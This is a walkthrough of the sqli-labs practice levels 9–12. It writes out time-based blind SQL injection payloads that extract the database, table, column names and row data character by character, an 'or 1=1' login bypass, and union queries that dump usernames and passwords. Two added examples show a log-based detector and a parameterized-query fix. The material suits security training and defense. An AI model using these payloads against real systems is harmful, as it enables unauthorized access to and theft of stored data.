Less-9
We start the usual way: find the injection point, determine the closing character, count the columns, try a union injection. This time the page never changes, so everyone will naturally think of blind injection. The previous level was boolean-based blind; could this one be boolean-based too??? Boolean-based blind injection works when the page responds differently to true and false conditions, and this level clearly differs from the previous one in that respect, so boolean-based blind is not suitable here. When the page stays the same no matter what, we can use time-based blind injection instead.
Time-based blind injection uses the sleep() and if() functions.
if(expression, sleep(5), 1) means: if the expression is true, the page waits 5 seconds before displaying (delay); if it is false, the page displays immediately (no delay)!!!
By checking whether the response is delayed we can tell whether the expression is true, and from that deduce the database name, table names and column names!
1. First determine the closing character: single quote
?id=1' and if(1=1,sleep(5),1)--+
The three loading dots at the top of the page spin for 5s before the page comes back.
2. Determine the length of the database name
?id=1' and if(length(database())=8,sleep(5),1)--+
The three loading dots at the top of the page spin for 5s before the page comes back.
3. Determine the database name
//security
?id=1' and if ((ascii(substr(database(),1,1))=115),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),2,1))=101),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),3,1))=99),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),4,1))=117),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),5,1))=114),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),6,1))=105),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),7,1))=116),sleep(5),1)--+
?id=1' and if ((ascii(substr(database(),8,1))=121),sleep(5),1)--+
4. Determine the table name
Determine the table name length
?id=1' and if(length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6,sleep(5),1)--+
//emails
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1)--+
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109),sleep(5),1)--+
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=97),sleep(5),1)--+
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=105),sleep(5),1)--+
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=108),sleep(5),1)--+
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=115),sleep(5),1)--+
5. Determine the column names
//column name length
?id=1' and if((select length(column_name) from information_schema.columns where table_name='emails' limit 0,1) = 2 ,sleep(5),1)--+
?id=1' and if((select length(column_name) from information_schema.columns where table_name='emails' limit 1,1) = 8 ,sleep(5),1)--+
//id
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)) =105),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),2,1)) =100),sleep(5),1)--+
//email_id
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),1,1)) =101),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),2,1)) =109),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),3,1)) =97),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),4,1)) =105),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),5,1)) =108),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),6,1)) =95),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),7,1)) =105),sleep(5),1)--+
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 1,1),8,1)) =100),sleep(5),1)--+
6. Dump the data
//length of the first row's data
?id=1' and if((select length(email_id) from emails limit 0,1) = 16 ,sleep(5),1)--+
//Dumb@dhahhan.com
?id=1' and if((ascii(substr((select email_id from emails limit 0,1),1,1)) = 68),sleep(5),1) --+
......
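As an added example that is not part of the original write-up, here is the defender's view of the sequence above: a small Python detector run over constructed access-log lines (an assumed log format with the response time in milliseconds as the last field) that flags requests carrying a delay function in a parameter and separates out the ones where the server actually stalled for about the sleep(5) the payload asked for.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (not taken from the page):
# client, request line, status, response time in milliseconds.
SAMPLE_LOG = """\
10.0.0.5 "GET /Less-9/?id=1 HTTP/1.1" 200 12
10.0.0.5 "GET /Less-9/?id=1'%20and%20if(1=1,sleep(5),1)--+ HTTP/1.1" 200 5014
10.0.0.5 "GET /Less-9/?id=1'%20and%20if(length(database())=7,sleep(5),1)--+ HTTP/1.1" 200 13
10.0.0.5 "GET /Less-9/?id=1'%20and%20if(length(database())=8,sleep(5),1)--+ HTTP/1.1" 200 5009
10.0.0.5 "GET /Less-9/?id=1'%20and%20if((ascii(substr(database(),1,1))=115),sleep(5),1)--+ HTTP/1.1" 200 5011
10.0.0.7 "GET /Less-9/?id=2 HTTP/1.1" 200 15
"""

LOG_RE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3}) (\d+)$')
# Delay functions that have no business inside a request parameter.
TIMING_RE = re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
DELAY_MS = 5000  # the delay requested by the page's sleep(5) payloads

def parse_line(line):
    """Return client, decoded parameter values and response time, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, path, _status, ms = m.groups()
    params = parse_qs(urlsplit(path).query)  # decodes %20 and '+' as space
    values = " ".join(v for vs in params.values() for v in vs)
    return {"client": client, "values": values, "ms": int(ms)}

def classify(rec):
    """'probe': a delay function sits in a parameter; 'fired': the server also
    stalled for about the requested delay, i.e. the injected condition was true."""
    if not TIMING_RE.search(rec["values"]):
        return None
    return "fired" if rec["ms"] >= DELAY_MS * 0.9 else "probe"

def summarize(log_text):
    """Per-client counts; a burst from one client is the signature of a character-by-character extraction."""
    counts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        verdict = classify(rec) if rec else None
        if verdict:
            counts.setdefault(rec["client"], {"probe": 0, "fired": 0})[verdict] += 1
    return counts

if __name__ == "__main__":
    print(summarize(SAMPLE_LOG))  # {'10.0.0.5': {'probe': 1, 'fired': 3}}
```

The response-time field is what turns a pattern match into evidence: a request with sleep() that returned in 13 ms was a probe whose condition was false, while a 5 s stall means the oracle answered yes.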
Less-10
Level 10 is the same as level 9; just replace the single quote with a double quote. It is not demonstrated again here.
Less-11
Opening it, we see it is quite different from the first 10 levels: this is a form, so the parameters must be passed via POST. Don't panic when you meet this kind of level; the approach is the same as before.
First determine the closing character: it is a single quote.
Then try the universal password:
'or 1=1 #    Note: the --+ comment sequence does not work here, so we use # instead.
or means "either": only one side has to be true, which is different from and (with and both sides must be true before anything executes). Since the 1=1 after it is always true, this is the universal password.
Enter 'or 1=1 # into the Username field and see whether the login succeeds.
Login succeeded.
Next we determine the number of columns, database name, table names, column names, data.....
Database name
' union select 1,database() #
Table names
' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1)#
Column names
' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1)#
Data
' union select (select group_concat(username) from security.users),(select group_concat(password) from security.users) #
Success!!!
Less-12
Opening it, it looks the same as level 11. First determine the closing character: entering 1' gives no output, entering 1" gives an error message.
The error shows there is also a parenthesis after the quote, so the closing sequence is ")
After that the steps are the same as in level 11.
Next we determine the number of columns, database name, table names, column names, data.....
//database name
") union select 1,database() #
//table names
") union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security' limit 0,1)#
//column names
")union select 1,(select group_concat(column_name) from information_schema.columns where table_name='users' limit 0,1)#
//data
")union select (select group_concat(username) from security.users),(select group_concat(password) from security.users) #
Success!!!
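As an added example (not part of the original write-up) serving both Less-11 and Less-12: the login query built by string concatenation, the way the lab's form handler does it, next to the parameterized form that closes the hole. It uses an in-memory SQLite table with constructed rows; SQLite comments with -- rather than MySQL's #, so the constructed test input uses that comment marker.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's users table (sample rows, not the lab's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "s3cret"), (2, "bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """User input is pasted into the SQL text, so a quote and a comment marker
    in the username rewrite the WHERE clause and the password check disappears."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s' LIMIT 1"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_safe(conn, username, password):
    """Placeholders: the driver passes the values separately from the query text,
    so quotes, 'or 1=1' and comment markers are just characters to compare."""
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    bypass = "' or 1=1 --"   # SQLite spelling of the page's 'or 1=1 #
    print(login_vulnerable(db, bypass, "wrong"))  # a username: logged in without a password
    print(login_safe(db, bypass, "wrong"))        # None: no such user
    print(login_safe(db, "alice", "s3cret"))      # alice
```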